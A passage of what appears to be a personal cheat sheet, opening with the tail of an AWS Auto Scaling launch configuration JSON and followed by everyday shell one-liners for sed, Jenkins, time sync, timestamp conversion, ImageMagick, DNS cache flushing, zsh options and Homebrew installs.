            "ClassicLinkVPCSecurityGroups": [],
            "CreatedTime": "2015-12-31T16:17:34.995Z",
            "BlockDeviceMappings": [
                {
                    "DeviceName": "/dev/sdf",
                    "Ebs": {
                        "DeleteOnTermination": false,
                        "SnapshotId": "snap-1f5c9e4f",
                        "VolumeSize": 32,
                        "VolumeType": "standard"
                    }
                },
                {
                    "DeviceName": "/dev/xvda",
                    "Ebs": {
                        "DeleteOnTermination": true,
                        "VolumeSize": 8,
                        "VolumeType": "standard"
                    }
                }
            ],
            "KeyName": "key-for-aws",
            "SecurityGroups": [
                "sg-2a14e74e"
            ],
            "LaunchConfigurationName": "AutoScaling-Test",
            "KernelId": "",
            "RamdiskId": "",
            "ImageId": "ami-59a08869",
            "InstanceType": "t2.micro"
        }
    ]
}

sed -n '开始行数,结束行数p'  待截取的文件

sed -n '开始行数,结束行数p'  待截取的文件  >> 新文件

java -jar jenkins.war --httpPort=9090

java -jar jenkins.war --httpsPort=9090

date -s '2022-10-21 21:50:00’

# 安装ntp
yum install ntp
# 同步时间
ntpdate pool.ntp.org

$ date -d @1554688861
2019年 04月 08日 星期一 02:01:01 UTC
$

$ date -d '2019-04-08T02:01:01' +%s
1554688861
$

convert input.jpg -colorspace Gray input_gray.jpg

convert input.jpg -separate input_gray.jpg

sudo killall -HUP mDNSResponder;sudo killall mDNSResponderHelper;sudo dscacheutil -flushcache

$ gzip -l package-lock.json.gz
  compressed uncompressed  ratio uncompressed_name
      146333       520297  71.8% package-lock.json
]$

unsetopt share_history

 ✗ printf nolinebreak
nolinebreak%
 ✗

unsetopt prompt_cr prompt_sp

# gnu sed
brew install gnu-sed

# gnu grep
brew install grep

alias grep='ggrep'
alias sed='gsed'